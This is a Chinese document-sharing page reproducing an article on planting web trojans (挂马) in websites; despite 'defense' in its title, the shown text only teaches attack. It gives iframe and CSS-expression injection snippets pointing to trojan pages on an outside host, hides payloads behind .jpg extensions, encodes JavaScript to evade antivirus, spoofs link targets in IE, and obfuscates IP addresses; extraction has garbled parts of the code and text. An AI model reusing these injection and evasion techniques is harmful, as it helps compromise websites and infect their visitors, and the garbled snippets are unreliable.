欢迎来到天天文库
浏览记录
ID:24632323
大小:52.50 KB
页数:4页
时间:2018-11-15
《了解常用集中网站挂马和防范方法》由会员上传分享,免费在线阅读,更多相关内容在工程资料-天天文库。
1、了解常用集中网站挂马和防范方法~教育资源库 1、挂马的N种方法 (1)HTML挂马法。 常规的HTML挂马方法一般是在网页中插入一条iframe语句,像<iframesrc=horse.htm/></iframe>;。不过第2种写法要注意:是原来的网页种要有body标签。 3)在css中挂马。 这个方法就是在css中写入body{hytop:expression(top.ument.body.innerHTML=top.ument.body.innerHTML+rn<iframesrc=horse.html/></iframe&
2、gt;);} 然后在主页中调用这个CSS,代码类似pub/shockp;_rpexternal.arthack.org/horse.htm(00:00:10.0就是发生第一事件的时间,这里是让计算机弹出网页;00:00:30.0同样,这是第二次发生的时间,在0时0分第30秒0微妙时弹出窗口;而后面的URL地址就是连接指定的木马地址。) 输入完毕后并保存,然后依次选择工具-合并事件,导入刚才的文本。当合并完成后,依次选择文本-Real文件另存为,保存好即可。 最后把生成的视频文件发布网上,当对方观看同时就会连接到你指定的木马地址 2、挂马的技巧 挂马首先要求的是隐蔽性,这
3、样挂的时间才能长。像在S中挂马就是比较隐蔽了,但是还可再用到些技巧。 (1)远程任意后缀执行HTML 可以把horse.html改成horse.jpg之类的后缀,然后语句写成<iframesrc=/uploadfile/200902/20090220105353594.jpge>。js也可以,语句为<scriptsrc=/uploadfile/200902/20090220105353594.jpg></script>,甚至js的不要后缀名都可以。 2)JS的加密 为了保护网页木马的代码,可以把JS内容加密,还能躲开杀软的作用。如果使用
4、ENCODE加密方式,加密后的JS调用语句就用<scriptlanguage=jscript.encodesrc=.arthack.org/horse.txtgt;</script>。除此方法外,还有其它更多的方法! (3)URL的变形 URL的变形方12下一页友情提醒:,特别!法也有很多,例如将url的16进制转换为encod编码等。如果是涉及到URL欺骗的方法就更多了,不过多数的URL欺骗,像利用的技巧,IE都已经打补丁了。但现在有个漏洞仍然有效,代码如下:<aid=CZYhref=.arthack.org></a><div
5、><ahref=.google.target=_blank><table><caption><ahref=.google.target=_blank><labelfor=CZY><ustyle=cursor:pointer:color:blue>Google</u></label></a></caption></table></a></div> 保存该代码为网页后,鼠标移动到Google这个链接上时,IE状态栏显示的.
6、google.,但点击链接后却打开.arthack.org网站。如果你的网马可以用IP地址访问到的话,IP地址也可以进行转换的。像127.0.0.1这样的IP还可以变为2130706433、07f.000.000.001、0177.0000.0000.0001等等,这只不过是8进制、10进制、16进制、的转换而已。 3、如何才能挂到马 拿到了l源文件里的代码逻辑)。上一页12友情提醒:,特别!
此文档下载收益归作者所有